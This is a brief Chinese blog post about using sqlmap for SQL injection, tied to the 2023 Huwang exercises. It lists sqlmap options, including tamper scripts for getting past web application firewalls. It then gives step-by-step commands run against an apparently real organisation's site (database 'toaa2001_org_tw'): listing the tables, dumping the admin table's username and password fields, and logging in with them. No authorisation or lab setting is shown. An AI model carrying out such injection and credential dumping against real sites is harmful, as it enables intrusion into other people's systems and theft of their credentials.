sqlmap加速了sql注入的发展,需要掌握6点,其一是–dbs获得数据库名称,其二是-D 数据库名称 –tables 获得数据库中的所有表名,其三是-D 数据库名 -T 表名 -C 字段1,字段2 –dump 获得数据库中的表中的字段的值,其四是-r POST请求.txt针对POST请求进行sql注入,其五是已知数据库用–dbms MYSQL进行漏洞探测,其六是使用–tamper变形载核绕过WAF。ailx10 预祝大家:2023护网取得好成绩~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
sqlmap注入,获得数据库名称(–dbs)
sqlmap -u "https://****" --dbs
sqlmap注入,获得数据库中的所有表名(-D 数据库名称 –tables)
sqlmap -u "https://***" -D toaa2001_org_tw --tables
sqlmap注入,获得数据库中的表中的所有字段(-D 数据库名 -T 表名 –columns)
sqlmap -u "https://***" -D toaa2001_org_tw -T admin --columns
sqlmap注入,获得数据库中的表中的字段的值(-D 数据库名 -T 表名 -C 字段1,字段2 –dump)
sqlmap -u "https://***" -D toaa2001_org_tw -T admin -C A_Pass,A_User --dump
使用账号和密码登录网站
登录网站成功,sqlmap就是这么朴实无华,且枯燥
© 版权声明
文章版权归作者所有,未经允许请勿转载。
相关文章
暂无评论...
